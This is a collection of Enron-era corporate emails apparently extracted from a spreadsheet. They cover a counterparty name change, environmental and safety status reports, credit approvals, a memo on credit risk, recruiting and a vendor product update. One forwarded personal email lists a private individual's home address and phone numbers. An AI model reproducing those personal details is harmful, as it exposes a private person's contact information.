Cc:	Blair, Lynn; Dietz, Rick_x000D_
Subject:	Update:  TransCanada --fyi, Upcoming Name Change_x000D_
_x000D_
We have received a letter from Gary Weihrauch advising of the name and Duns change for the above.  I will bring copies down to your desks immediately.  _x000D_
_x000D_
After your review, please advise if I need to obtain further information.  I realize time is very short to accomplish this by November 1st.  Thanks for your help._x000D_
_x000D_
Sherry_x000D_
ext. 3-3063_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lee, Dennis  _x000D_
Sent:	Wednesday, October 03, 2001 3:10 PM_x000D_
To:	Forbish, Sherry_x000D_
Cc:	Blair, Lynn; Dietz, Rick_x000D_
Subject:	RE: TransCanada --fyi, Upcoming Name Change_x000D_
_x000D_
We have not yet received the appropriate paperwork.  November 1 is the EARLIEST we can make the name change assuming we receive the paperwork and we get the proper credit approval.  I understand there will also be a DUNS number change.  If this is true, we need to notify all our shippers a minimum of 5 days in advance.  _x000D_
_x000D_
We'll push the name change through as quickly as possible, but we can't do it until our ducks are in a row._x000D_
_x000D_
Dennis_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Forbish, Sherry  _x000D_
Sent:	Wednesday, October 03, 2001 3:01 PM_x000D_
To:	Blair, Jean; Bryan, Randy; Barry, Patrick; Callans, Nancy; Clapper, Karen; Washington, Kathy; Porter, Diana; Perry, Renee; Walden, Shirley; Carr, James; Vaughan, Cara; Greaney, Chris; Scurlock, Debra; Woodson, Harry; McDaniel, Janet; Adams, Jean; Linhart, Joe; Sturr, Kathy; Janzen, Randy; Benningfield, Robert; Hibbard, Scott; Forbish, Sherry_x000D_
Cc:	Blair, Lynn; Zadow, Raetta; Berger, Larry; Buchanan, John; Kowalke, Terry; Spraggins, Gary; Schoolcraft, Darrell; Lee, Dennis; Trevino, Linda; Brostad, Karen; Carter, Zuela; Steele, Patricia; Corman, Shelley_x000D_
Subject:	TransCanada --fyi, Upcoming Name Change_x000D_
_x000D_
As most of you know, BP purchased the gas and power marketing division of TransCanada effective October 1st.  The legal entity and name change will go into our system November 1st.  My understanding is the appropriate documentation has already been sent to our offices._x000D_
_x000D_
In the event, anyone telephones them, the receptionists in their Omaha offices now answer the telephone as BP Gas &amp; Power.  The legal name actually is BP Canada Energy Marketing Corp.  To date, it appears there have been no other changes with scheduling and accounting personnel._x000D_
_x000D_
Should there be any questions, please let me know -- thanks._x000D_
</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 04:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'michael.terraso@enron.com'})</t>
  </si>
  <si>
    <t>weekly report EHS</t>
  </si>
  <si>
    <t>ENA/EES-OEC=20_x000D_
_x000D_
New Jersey, Garden State Paper Mill =01) Scott Watson scheduled to conduct=_x000D_
=20_x000D_
Safety/Health Audit of this facility the week of December 11, 2000.=20_x000D_
=20_x000D_
Quality Management Plan (QMP) for Texas Bases RFP =01) Assisting OEC in=20_x000D_
preparing an Environmental Compliance Plan for the Military Projects.=20_x000D_
_x000D_
Florida Power Plant Project =01) Scott Watson provided Steve Rose (ENA) wit=_x000D_
h=20_x000D_
EH&amp;S information pertaining to Process Safety Management and Risk Managemen=_x000D_
t=20_x000D_
Plan Regulations.=20_x000D_
_x000D_
SPCC Plans for the Peaker Power Plants =01) Ramiro Garcia worked with OEC=_x000D_
=20_x000D_
management at the Brownsville, Gleason, and Wheatland Peakers on their SPCC=_x000D_
=20_x000D_
Plans.  He expects the plan for Wheatland to be completed by 11/30/00 and t=_x000D_
he=20_x000D_
plans for the other plants by 12/15/00.=20_x000D_
_x000D_
Due Diligence Support for the 1999 Peakers =01) Gus Eghneim is supporting t=_x000D_
he=20_x000D_
effort to sell the 1999 Peaker plants by responding to written and verbal=_x000D_
=20_x000D_
questions from potential buyers and Enron=01,s internal coordination team a=_x000D_
bout=20_x000D_
environmental issues._x000D_
=20_x000D_
1999 Peaker Plants Refinancing =01) Gus Eghneim is supporting the refinanci=_x000D_
ng=20_x000D_
activities for the 1999 Peaker plants by responding to environmental=20_x000D_
questions prepared for this purpose.=20_x000D_
_x000D_
ACQUISITIONS_x000D_
_x000D_
Privatenel (Nicaragua) Power Plant Privatization -  Don Stevens has learned=_x000D_
=20_x000D_
that the advisors to the Privatization have recommended to put the calendar=_x000D_
=20_x000D_
for the bid on hold until the courts in Nicaragua rule on the legality of t=_x000D_
he=20_x000D_
process. =20_x000D_
_x000D_
Project INGA (California and Pennsylvania Power Plant Acquisition) - Bill=_x000D_
=20_x000D_
Keeney has informed that financial close is hoped to occur by the end of ye=_x000D_
ar=20_x000D_
(2000).  Susan Worthen provided the "Final Environmental Summary" to George=_x000D_
=20_x000D_
Schaefer, Frank Smith, Lou Stoler, Terry Donovan, Bill Williams, and Dave=_x000D_
=20_x000D_
Duran.  The summary addressed the issues of Section 114 response letters, M=_x000D_
t.=20_x000D_
Poso coal ash, impact of future regulations and ACE quarry issue._x000D_
_x000D_
CWT Thermo-Depolymerization (EES New Technology) - Don Stevens has been=20_x000D_
informed by Gene O'Gorman that Enron has put a six month hold on the=20_x000D_
project.  An environmental issues matrix is being prepared for the project._x000D_
_x000D_
Massey (JV Coal Mine) - A possible site visit to review the environmental=_x000D_
=20_x000D_
impacts from the Massey issue in Kentucky is being discussed._x000D_
_x000D_
North Carolina CF Power Plants - Enron is attempting to acquire two coal=20_x000D_
fired (QF) power plants in North Carolina.  Don Stevens contacted Dwight=20_x000D_
Beach to discuss the proposed acquisition.  ENSR conducted the site due=20_x000D_
diligence, Dwight Beach will forward a copy to Don Stevens._x000D_
_x000D_
PROJECTS_x000D_
_x000D_
EHS Web Site - The  web site will be launched by December 1st.  Gavin=20_x000D_
Dillingham and the Enron Networks Business Analyst, Tamika Hebert are=20_x000D_
populating the site with documents and databases.=20_x000D_
_x000D_
Telework/NEPI Program - Gavin Dillingham has been in contact with the=20_x000D_
National Environmental Policy Institute (NEPI) and has set up a meeting for=_x000D_
=20_x000D_
December 14th  to discuss the opportunities for Enron to earn emissions and=_x000D_
=20_x000D_
tax credits by participating in a nation wide teleworking program. This=20_x000D_
program through NEPI may also be applied to Enron=01,s possible development=_x000D_
 of=20_x000D_
vanpools and Enron providing 100% subsidies for Metro bus riders. Patti Ucc=_x000D_
i=20_x000D_
of Enron Building Services will attend the meeting. Gavin has also contacte=_x000D_
d=20_x000D_
Larry Fenstad about the meeting but has not received a response.=20_x000D_
_x000D_
Lifecycle Process - Gavin Dillingham is filling in the spreadsheet for Enro=_x000D_
n=01,_x000D_
s lifecycle process. Much of the information for Enron Wholesale and Enron=_x000D_
=20_x000D_
ETS/EOTT has been entered into the spreadsheet. Heather Mitchell from EES,=_x000D_
=20_x000D_
has offered to help in providing numbers from EES.=20_x000D_
_x000D_
Greenhouse Gas Inventory - Gavin Dillingham has been working with Henry Van=_x000D_
=20_x000D_
and his group to determine asset fuel types and fuel volumes for the=20_x000D_
Greenhouse Gas Inventory. He has received most of the data, but there has=_x000D_
=20_x000D_
been some difficulty on getting the complete data from some of the assets.=_x000D_
=20_x000D_
_x000D_
Asset Tracking Database - Gavin Dillingham has designed an asset tracking=_x000D_
=20_x000D_
database for the EHS Compliance Group. The database will help in tracking t=_x000D_
he=20_x000D_
greenfield and brownfield projects that are currently being developed by=20_x000D_
Enron=01,s business/deal teams and the role that EHS is playing in these=20_x000D_
projects.=20_x000D_
_x000D_
REGULARORY -SAFETY/ ENVIRONMENTAL_x000D_
_x000D_
Enron Ergonomics Program Action Plan - Russell Tucker developed an Enron=20_x000D_
Ergonomics Program implementation plan to comply with the  Grandfather=20_x000D_
exemption under the OSHA final rule on Ergonomics. This would avoid at some=_x000D_
=20_x000D_
point having to implement the complex, prescriptive and resource intensive=_x000D_
=20_x000D_
OSHA standard, reducing record keeping requirements, ability to shelter new=_x000D_
=20_x000D_
facilities and acquired companies as Grandfathered and structure the Enron=_x000D_
=20_x000D_
program in the most efficient manner taking advantage of existing risk=20_x000D_
management procedures. The plan was reviewed by the Enron Safety Subcouncil=_x000D_
,=20_x000D_
the Wellness group and our contract occupational health physician._x000D_
_x000D_
Final Enron Ergonomic Programs Issued -  Russell Tucker issued to the membe=_x000D_
rs=20_x000D_
of the Enron EH&amp;S Council the final drafts of the Enron Office and=20_x000D_
Plant/Field Ergonomic Program procedures updated to meet the requirements o=_x000D_
f=20_x000D_
the OSHA final rule for Grandfathering.=20_x000D_
_x000D_
Enron Ergonomics Program Legal Review - Russell Tucker and Frank Smith, Enr=_x000D_
on=20_x000D_
Corp Legal, selected outside legal council to review the proposed Enron=20_x000D_
Office and Plant/Field implementation plan and written programs against=20_x000D_
OSHA's final rule requirements for Grandfathering. With minor suggestions,=_x000D_
=20_x000D_
the plan and written programs were found to be in keeping with the final ru=_x000D_
le=20_x000D_
for Grandfathering.=20_x000D_
_x000D_
Pennsylvania Coal Plants - Marc Phillips provided information about future=_x000D_
=20_x000D_
regulations that could impact three coal plants in Pennsylvania. All three=_x000D_
=20_x000D_
plants will be subject to the cap and trade program to reduce NOx emissions=_x000D_
._x000D_
_x000D_
Houston Non-attainment Regulations - Marc Phillips provided insight on the=_x000D_
=20_x000D_
Houston non-attainment regulations to interested Enron personnel. The engin=_x000D_
e=20_x000D_
control limit will be 0.5 grams/hp-hr and the control dates will be delayed=_x000D_
=20_x000D_
for two years._x000D_
_x000D_
EcoElectrica Title V Air Permit -  Marc Phillips has started his review of=_x000D_
=20_x000D_
EcoElectrica's Title V draft operating permit._x000D_
_x000D_
_x000D_
EUROPE, INDIA and ASIA_x000D_
_x000D_
Europe, Enron Metals =01)  Alan Stringer is working on the integration of E=_x000D_
nron=20_x000D_
EHS Guidelines for Enron Metals. Alan developed a risk and liability=20_x000D_
management plan for the German Essen site to protect the warranties and=20_x000D_
indemnification in the leasehold contract.    Scott Watson is scheduled to=_x000D_
=20_x000D_
conduct an EH&amp;S Audit of facility in Rancho Dominguez, CA December 4th &amp; 5t=_x000D_
h,=20_x000D_
2000. =20_x000D_
_x000D_
UK ETOL- Alan Stringer conducted an EHS audit on  Nov. 28, '00.  A report=_x000D_
=20_x000D_
will be prepared next week.=20_x000D_
_x000D_
Spain, Arcos Plant =01) Alan Stringer submitted comments on construction EH=_x000D_
S =20_x000D_
plan from the owners perspective.=20_x000D_
_x000D_
Germany, Seines =01) Alan Stringer reviewed documentation for contamination=_x000D_
=20_x000D_
issues for parcel of land that Enron will take an option on._x000D_
_x000D_
Philippines, Batangas Power Corporation and Subic Power Corporation Visit -=_x000D_
=20_x000D_
Alan Stringer assisted in developing strategy on how to comply with the new=_x000D_
=20_x000D_
regulations for installation of stack and ambient air continuous monitoring=_x000D_
=20_x000D_
system as required by the 1999 Clean Air Act.    Gus Eghneim  is working wi=_x000D_
th=20_x000D_
the plant managers to assess the impact of the regulations on the two sites=_x000D_
=20_x000D_
and develop compliance strategies._x000D_
_x000D_
CALME_x000D_
_x000D_
Panama, Bahia Las Minas and San Francisco Site  -  No additional soil remov=_x000D_
al=20_x000D_
is required.  Samples from remediated soils met disposal requirements for=_x000D_
=20_x000D_
local landfill.  Impacted soil is being removed and new soil is being place=_x000D_
d=20_x000D_
in excavated areas.  Letter to ANAM is to be delivered indicating that we=_x000D_
=20_x000D_
will stop Ambient Air Monitoring Program at the end of November, 2000.  BLM=_x000D_
=20_x000D_
has complied with contractual requirements of monitoring for 1 year.  BLM h=_x000D_
as=20_x000D_
contracted with a local engineering firm to design secondary containment=20_x000D_
around large fuel storage tanks.  ThermoRetec has provided a draft Remedial=_x000D_
=20_x000D_
Investigation for the Colon site to Enron EHS in Houston and BLM in Panama.=_x000D_
 =20_x000D_
BLM has installed oil / water separators in discharge sumps of fuel storage=_x000D_
=20_x000D_
tanks to eliminate discharge of bunker and diesel to storm water channel._x000D_
_x000D_
Puerto Rico, San Juan Gas - D. Willmann and ThermoRetec met with James=20_x000D_
McMillan and Bill Middleton with EECC to discuss the coordination of=20_x000D_
environmental remediation work at San Juan Gas with the project for=20_x000D_
installing an LNG tank at San Juan Gas.  There should be some significant=_x000D_
=20_x000D_
cost savings by coordinating the two projects.  We are waiting on laborator=_x000D_
y=20_x000D_
analysis of impacted soils before developing final remediation plan._x000D_
_x000D_
SOUTH AMERICA_x000D_
_x000D_
Bolivia, Bolivia-Brazil Pipeline Projects (GOB/GOMT) - Edgar Zuleta conduct=_x000D_
ed=20_x000D_
an EHS audit of the project this week.   Report will be prepared next week.</t>
  </si>
  <si>
    <t>Wed, 28 Nov 2001 08:10:17 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kathy.campos@enron.com'})</t>
  </si>
  <si>
    <t>Re: How are you feeling?</t>
  </si>
  <si>
    <t>Just sitting around._x000D_
--------------------------_x000D_
Sent from my BlackBerry Wireless Handheld (www.BlackBerry.net)</t>
  </si>
  <si>
    <t>Fri, 30 Nov 2001 11:12:06 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bwalsh@isda.org'})</t>
  </si>
  <si>
    <t>Documentation Committee</t>
  </si>
  <si>
    <t>Thank you to those who attended the Documentation Committee meeting in New_x000D_
York on November 29. We look forward to meeting our European members at the_x000D_
meeting on December 13 in London.  _x000D_
_x000D_
Earlier this week, we distributed the first draft of the 2002 ISDA Master_x000D_
Agreement with accompanying documents to the Committee.  We strongly_x000D_
encourage you to participate in the development of the 2002 ISDA Master_x000D_
Agreement. To that end, please send in your comments on the first draft of_x000D_
the Master Agreement by Monday, January 7.   Comments should be addressed to_x000D_
Kimberly Summe (ksumme@isda.org) and Katherine Darras (kdarras@isda.org).  _x000D_
_x000D_
If you have any questions, please do not hesitate to contact us at_x000D_
212-332-1200.  Thank you in advance._x000D_
_x000D_
_x000D_
N.B.  If you have not already done so you can obtain a copy of the above_x000D_
mentioned draft Master Agreement and supporting documents by sending a blank_x000D_
email to "Documents@isda.org" with "Documentation" typed in the subjectline_x000D_
of the email.  You will then receive a copy of the documents by auto reply_x000D_
email.  _x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Tue, 2 Jan 2001 02:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'david.ryan@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'hunter.s.shively@enron.com'})</t>
  </si>
  <si>
    <t>European 10 jet stream heights</t>
  </si>
  <si>
    <t>We have only the heights for now - maybe someday we'll see days 8 and 9. _x000D_
Good luck,_x000D_
Dave_x000D_
_x000D_
http://www.sca.uqam.ca/models/_x000D_
http://www.sca.uqam.ca/models/ecmwf_amer/cep00_9panel.gif</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 07:56:51 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Credit request PG&amp;E Energy Trading-Gas Corp</t>
  </si>
  <si>
    <t>approved._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lee, Dennis  _x000D_
Sent:	Tuesday, January 29, 2002 8:34 AM_x000D_
To:	Bodnar, Michael; Buehler, Craig; Cherry, Paul; Dasilva, Esther; Donoho, Lindy; Frazier, Perry; Lee, Dennis; Lindberg, Lorraine; Lohman, TK; Lokay, Michelle; Sheffield, Sandy; White, Angela_x000D_
Subject:	Credit request PG&amp;E Energy Trading-Gas Corp_x000D_
_x000D_
Credit Approval Requested:_x000D_
_x000D_
Request Submitted to CAS for approval._x000D_
_x000D_
_x000D_
Shipper :		PG&amp;E Energy Trading-Gas Corp_x000D_
Contract # :		27819_x000D_
Service Type :	New FT_x000D_
MDQ:			20,000 Dth/d_x000D_
Rate:			$ 0.205_x000D_
Term:			February 1, 2002 thru October 31, 2002_x000D_
_x000D_
_x000D_
Dennis P. Lee_x000D_
ETS_x000D_
Gas Logistics_x000D_
(713) 853-1715_x000D_
dennis.lee@enron.com</t>
  </si>
  <si>
    <t>Wed, 1 Mar 2000 03:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: IT Hardware</t>
  </si>
  <si>
    <t>Bob:   I am still wonderring why the external modems my group had were _x000D_
removed.  It seems like I am always having to order modems and accessories _x000D_
every time we move anyone.  Since we are getting ready to move again, maybe _x000D_
we should get an inventory of everything each logistic's person has at their _x000D_
workstation, and this is what should be moved.</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 08:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kate@powerbrokersllc.com'})</t>
  </si>
  <si>
    <t>Joao Neves</t>
  </si>
  <si>
    <t>Vince,_x000D_
I wanted to follow up with you to see if you had an  opportunity to review _x000D_
Joao Neves' resume, which I sent?you last Wednesday,  and to get your _x000D_
feedback on him._x000D_
?_x000D_
Please?let me know if you are interested in?setting  up an interview._x000D_
?_x000D_
Also, I will be in Houston the afternoon of? Friday,  4/13, and would welcome _x000D_
the opportunity to meet with you in person, if your  schedule allows.?_x000D_
?_x000D_
I look forward to hearing from you._x000D_
?_x000D_
Regards,_x000D_
?_x000D_
Kate Szablya_x000D_
Power Brokers, LLC_x000D_
Energy Search and  Recruitment_x000D_
303-716-2987_x000D_
303-619-7589 cell_x000D_
303-716-3426  fax_x000D_
kate@powerbrokersllc.com_x000D_
www.powerbrokersllc.com_x000D_
?_x000D_
?</t>
  </si>
  <si>
    <t>Wed, 9 May 2001 09:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Rio Nogales Power Plant, Seguin, Texas; Confirmation of Assignment_x000D_
 of Agreement to Interconnect and POperate Natural Gas Pipeline Facilities_x000D_
 between HPL and Rio Nogales Power Project to PNG Utility.</t>
  </si>
  <si>
    <t xml:space="preserve">Gerald,_x000D_
FYI._x000D_
Greg B._x000D_
---------------------- Forwarded by Greg Brazaitis/HOU/ECT on 05/09/2001 _x000D_
04:02 PM ---------------------------_x000D_
From: Greg Brazaitis on 05/09/2001 03:30 PM_x000D_
To: Eric Gillaspie/HOU/ECT@ECT, Carolyn Gilley/HOU/ECT, Yvette _x000D_
Miroballi/Enron@EnronXGate_x000D_
cc: James I Ducote/HOU/ECT@ECT, Brian Redmond/Enron@EnronXGate, Steve HPL _x000D_
Schneider/HOU/ECT@ECT _x000D_
Subject: Rio Nogales Power Plant, Seguin, Texas; Confirmation of Assignment _x000D_
of Agreement to Interconnect and POperate Natural Gas Pipeline Facilities _x000D_
between HPL and Rio Nogales Power Project to PNG Utility._x000D_
_x000D_
Eric, Carolyn, and Yvette:_x000D_
I will sent to you via interoffice mail, a copy (Carolyn you will get the _x000D_
original transmittal) of a confirmation of assignment of the referenced _x000D_
Interconnect Agreement.  The assignment was specified in the Interconnect _x000D_
Agreement as permitted at the counterparty's option, and as per my e-mail _x000D_
dated April 18th, Constellation has requested that the assignment be made.  _x000D_
The document that I am forwarding is confirmation of the assignment of the _x000D_
Interconnect Agreement by Constellation Power Source Holdings (Rio Nogales _x000D_
Power Project) to Pinnacle Natural Gas (PNG Utility Company) so that our file _x000D_
is complete.  The Agreement to Interconnect and Operate Natural Gas PIpeline _x000D_
Facilities between HPL and Rio Nogales Power Project was executed April 17, _x000D_
2001._x000D_
_x000D_
Questions?: 713-571-3170_x000D_
_x000D_
Greg_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 31 Jan 2002 08:23:40 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'sean.crandall@enron.com', 'diane.cutsforth@enron.com', 'diana.scholtes@enron.com'})</t>
  </si>
  <si>
    <t>FW: Hey there sugar!</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Srunswick@aol.com [mailto:Srunswick@aol.com]_x000D_
Sent: Wednesday, January 30, 2002 12:11 PM_x000D_
To: Semperger, Cara_x000D_
Subject: Hey there sugar!_x000D_
_x000D_
_x000D_
I have definatly missed you.  I have missed everyone.  I like my new job but Sean was right, it is very slow paced here.  I find myself fighting for things to do some of the time.  I live on my own, I really dig my new pad.  It's definatly different living by myself.  Please tell everyone I said hello and if they want my address or phone number you are welcome to pass it on.  _x000D_
_x000D_
Stacy Runswick               Hm.  (916) 391-3370_x000D_
465 Rivergate Wy. #27        Cell (916) 425-5274_x000D_
Sacramento, CA 95831</t>
  </si>
  <si>
    <t>Mon, 11 Dec 2000 03:00:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">Please read.  Thanks._x000D_
_x000D_
DG _x000D_
---------------------- Forwarded by Darron C Giron/HOU/ECT on 12/11/2000 _x000D_
10:59 AM ---------------------------_x000D_
_x000D_
_x000D_
Jeffrey C Gossett_x000D_
12/11/2000 10:35 AM_x000D_
To: Kam Keiser/HOU/ECT@ECT, Darron C Giron/HOU/ECT@ECT, William _x000D_
Kelly/HOU/ECT@ECT, David Baumbach/HOU/ECT@ECT, Errol _x000D_
McLaughlin/Corp/Enron@ENRON_x000D_
cc:  _x000D_
Subject: How do officialized books make it to credit?_x000D_
_x000D_
Please forward this to your groups. Thanks._x000D_
---------------------- Forwarded by Jeffrey C Gossett/HOU/ECT on 12/11/2000 _x000D_
10:38 AM ---------------------------_x000D_
_x000D_
From: Shona Wilson@ENRON on 12/11/2000 10:35 AM_x000D_
To: Bob M Hall/NA/Enron@Enron, Leslie Reeves/HOU/ECT@ECT, Jeffrey C _x000D_
Gossett/HOU/ECT@ECT, Peggy Hedstrom/CAL/ECT@ECT, Kathy Reeves/CAL/ECT@ECT, _x000D_
Stacey W White/HOU/ECT@ECT, Monica Lande/PDX/ECT@ECT, David _x000D_
Maxwell/HOU/ECT@ECT, Martha Stevens/HOU/ECT@ECT, Scott Mills/HOU/ECT@ECT, _x000D_
Scott Earnest/HOU/ECT@ECT, Michelle Bruce/HOU/ECT@ECT, Sheila _x000D_
Glover/HOU/ECT@ECT, D Todd Hall/HOU/ECT@ECT, Brenda F Herod/HOU/ECT@ECT, _x000D_
Michael E Moscoso/HOU/ECT@ECT, Kristin Albrecht/Enron Communications@Enron _x000D_
Communications, Gary Stadler/Enron Communications@Enron Communications, _x000D_
Meredith M Eggleston/HOU/EES@EES, James New/LON/ECT@ECT, Heidi _x000D_
Mason/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Jan-Erland Bekeng/AP/Enron@Enron, _x000D_
Jay Knoblauh/HOU/ECT@ECT_x000D_
cc: Sally Beck/HOU/ECT@ECT, Brent A Price/HOU/ECT@ECT, Mike _x000D_
Jordan/LON/ECT@ECT, Chris Abel/HOU/ECT@ECT, Kenneth _x000D_
Thibodeaux/NA/Enron@ENRON, Michael Benien/Corp/Enron@ENRON, Burton _x000D_
McIntyre/HOU/ECT@ECT, Susan D Trevino/HOU/ECT@ECT, Nancy _x000D_
Hernandez/NA/Enron@ENRON, Debbie R Brackett/HOU/ECT@ECT, John D _x000D_
Powell/HOU/ECT@ECT, Ganapathy Ramesh/HOU/ECT@ECT, Joel _x000D_
Henenberg/NA/Enron@Enron, Matt A Brown/HOU/ECT@ECT _x000D_
Subject: How do officialized books make it to credit?_x000D_
_x000D_
In the past few months much focus has been put on understanding VAR and how _x000D_
it is calculated (through RisktRAC).  However, everyone should note that the _x000D_
credit department also receives our information.  Market risk and credit risk _x000D_
are inherently different, with different requirements.  This memo serves as a _x000D_
reminder of what some of the key differences are, how the credit system uses _x000D_
RisktRAC differently from market risk, how this affects us, what some key _x000D_
problems are in the credit system caused by our data, and changes to be made _x000D_
by risk management groups._x000D_
_x000D_
differences are between credit and market risk - you all know this, but many _x000D_
of your ba's don't. _x000D_
when a book is flat it still has an effect on credit.  Flat books must be _x000D_
officialized_x000D_
market risk is keyed off positions and curves.  When we make money, market _x000D_
risk is reduced.  Credit risk is keyed off positions with customers.  When we _x000D_
make money, credit risk is increased, as people owe us more money._x000D_
_x000D_
how the credit system uses RisktRAC differently from market risk_x000D_
Market risk picks up all officialized books.  If a book is not officialized _x000D_
it does not pick the book up._x000D_
Credit picks up all officalized books.  If a book is not officialized, it _x000D_
picks up the previous day's position.  Therefore, if positions in book A are _x000D_
moved to book B, and A is no longer officialized, credit picks up the _x000D_
previous day's position for book A.  As a result, if a book is no longer _x000D_
used, please officialize it the first day it is no longer used, so credit _x000D_
will pick up 0 on a go forward basis._x000D_
Market risk is not concerned with counterparty codes and names._x000D_
Credit needs correct counterparty codes and names.  In recent months, the _x000D_
counterparty information has deteriorated.  Enron official counterparty names _x000D_
need to be used so they flow properly to credit._x000D_
_x000D_
what are some key problems in the credit system caused by our data_x000D_
As referenced above: correct counterparty names and books with 0 positions _x000D_
not being officialized so credit picks up previous day info._x000D_
As a takeaway from this message please ensure only correct counterparty names _x000D_
are used and that if a book has 0 positions that it is officialized the first _x000D_
day it has 0 positions._x000D_
_x000D_
If you have specific questions about credit, please call Debbie Brackett, at _x000D_
X35856. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Jun 2000 09:25:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marie.heard@enron.com', 'stacy.dickson@enron.com', 'harry.collins@enron.com', 'david.portz@enron.com', 'david.minns@enron.com', 'alan.aronowitz@enron.com', 'elizabeth.sager@enron.com', 'jeffrey.hodge@enron.com', 'robbi.rossi@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>EOL / Credit / GCP Responses 6/28/00</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Tana Jones/HOU/ECT on 06/28/2000 04:25 PM -----_x000D_
_x000D_
	Tom Moran_x000D_
	06/28/2000 04:00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Linda S Bryan/HOU/ECT@ECT, Connie Sutton/HOU/ECT@ECT, Sylvia A _x000D_
Campos/HOU/ECT@ECT, Molly Harris/HOU/ECT@ECT, Cynthia Clark/Corp/Enron@ENRON, _x000D_
Mary G Gosnell/HOU/ECT@ECT, Enron Europe Global Contracts and Facilities, _x000D_
Enron Europe Global CounterParty, Stephanie Sever/HOU/ECT@ECT, Bradley _x000D_
Diebner/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: EOL / Credit / GCP Responses 6/28/00_x000D_
_x000D_
_x000D_
Please find attached Credit's EOL responses for 6/28/00._x000D_
_x000D_
_x000D_
_x000D_
Regards_x000D_
tm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Wed, 3 Jan 2001 03:45:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Bill of Sale</t>
  </si>
  <si>
    <t xml:space="preserve">I think it is two separate documents, one for each purchaser (CAED I and CAED _x000D_
II)._x000D_
_x000D_
ckm_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Fred Mitro@ECT_x000D_
01/03/2001 11:32 AM_x000D_
To: Kay Mann/Corp/Enron@Enron_x000D_
cc: Ben Jacoby/HOU/ECT@ECT, Chris Booth/NA/Enron@Enron, Rebecca _x000D_
Walker/NA/Enron@Enron _x000D_
_x000D_
Subject: Bill of Sale_x000D_
_x000D_
Kay:_x000D_
_x000D_
Here is the information required for the Bill of Sale exhibit.   Let me know _x000D_
if any additional information is needed and I will coordinate with Chris _x000D_
Booth and Rebecca Walker.  I will draft an exhibit with this information in a _x000D_
Word document as the formal attachment.  _x000D_
_x000D_
Does the Bill of Sale document require 2 separate exhibits (similar to the _x000D_
notice of option exhibits) or can all the information be shown on one _x000D_
exhibit?  Let me know._x000D_
_x000D_
Fred_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 31 Jul 2001 06:06:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'corry.bentley@enron.com', 'don.baughman@enron.com', 'juan.hernandez@enron.com'})</t>
  </si>
  <si>
    <t>FW: Traffic Report outage and new product enhancements</t>
  </si>
  <si>
    <t xml:space="preserve">Note the new ATC features below._x000D_
 -----Original Message-----_x000D_
From: 	"Stuart Wright" &lt;stuart@friedwire.com&gt;@ENRON [mailto:IMCEANOTES-+22Stuart+20Wright+22+20+3Cstuart+40friedwire+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Monday, July 30, 2001 2:58 PM_x000D_
To:	productalert@friedwire.com_x000D_
Subject:	Traffic Report outage and new product enhancements_x000D_
_x000D_
_x000D_
To Our Valued  Traffic Report Clients,_x000D_
 _x000D_
Today, FriedWire's  Traffic Report experienced a disruption in service as a result of network and  general connectivity problems caused by third parties.  We apologize for  this inconvenience and are working with all of our partners to insure that this  does not happen again.  As always, we remain committed to providing you  power markets information around-the-clock. _x000D_
Product Update _x000D_
FriedWire has just added significant new content and  capability to the Traffic Report, which areoutlined below.  Please contact us for  brief, online tutorials on how to use the new features. _x000D_
NOAA Climate Prediction Center (CPC) Weather  Forecasts _x000D_
    3-7 day Maximum Temperatures  _x000D_
    6-10 day Outlook and Temperature Probability  _x000D_
    8-14 day Prognostic Temperature Anomaly  _x000D_
    Excessive Heat Outlooks (for the same time periods listed  above) _x000D_
    Precipitation Outlooks and Anomalies _x000D_
***You may also be able to set up e-mail notification  services to alert you when the new forecasts become available so that you don't  have to continually check to see if the new data have been posted. _x000D_
Available Transmission Capacity  _x000D_
FriedWire has developed a new interface that will allow you to search for  available transmission by path.  The new geographic interface will allow  you to choose a path and then view the detailed ATC offerings and then navigate  to easily see reverse-path information, thru-path offerings, offerings from  non-path providers and more. _x000D_
***E-mail and wireless text-paging notification  services are now available along with the new ATC interface.  Now, you can  be automatically notified when new ATCs are posted by providers or on paths that  you track ongoingly.  You can custom define your alerts according to the  provider, path, service increment, time period, class, etc.that you're  interested in, as well as define when you want to be contacted (days of the  week, time of day, times per day, etc.). _x000D_
The following additional product upgrades have been  deployed: _x000D_
All hourly offerings are now reflected in military  time designations. _x000D_
Hourly ATC selection reflected now as a range  (i.e.; 13:00 - 14:00) instead of hour-beginning 1:00 PM. _x000D_
Eight new flowgates have been added for  Sierra-Pacific Power and 74 for MidAmerican Energy.  They all have  Intertie Profiles and can be located by selecting "View All Interties".   All will be located and plotted on the power flow maps in the next couple of  weeks. _x000D_
